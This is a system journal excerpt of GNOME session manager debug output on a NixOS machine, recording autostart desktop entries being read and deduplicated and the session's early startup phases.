machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/var/nix/profiles/default/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /run/current-system/sw/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Housekeeping.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Keyboard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sound.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sharing.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.A11ySettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.UsbProtection.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/xdg-user-dirs.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App24 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-pkcs11.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App25 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wwan.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App32 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.PrintNotifications.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-ssh.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App27 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/gnome-keyring-secrets.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'gnome-keyring-secrets.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/at-spi-dbus-bus.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App33 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wacom.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Rfkill.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sound.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Wwan.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App32 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/at-spi-dbus-bus.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App33 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Datetime.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Datetime.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/orca-autostart.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App35 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/orca-autostart.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App35 to store
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.MediaKeys.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.MediaKeys.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.XSettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.XSettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Power.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Power.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Color.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Color.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Smartcard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Smartcard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Housekeeping.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Housekeeping.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Keyboard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Keyboard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sharing.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sharing.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.A11ySettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.A11ySettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.UsbProtection.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.UsbProtection.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.UsbProtection.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.PrintNotifications.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.PrintNotifications.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wacom.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Wacom.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wacom.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Rfkill.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Rfkill.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Rfkill.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sound.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sound.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Wwan.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wwan.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Wwan.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Wwan.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Datetime.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Datetime.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.MediaKeys.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.MediaKeys.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.MediaKeys.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.XSettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.XSettings.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Power.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Power.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Color.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Color.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Color.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Smartcard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Smartcard.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart/org.gnome.SettingsDaemon.ScreensaverProxy.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.ScreensaverProxy.desktop' already exists
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: GSM starting to manage
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: GSM starting to manage
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: App startup summary
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: App startup summary
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase PRE_DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App25 app-id:gnome-keyring-pkcs11.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App18 app-id:gnome-keyring-secrets.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App27 app-id:gnome-keyring-ssh.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App1 is disabled by X-GNOME-HiddenUnderSystemd
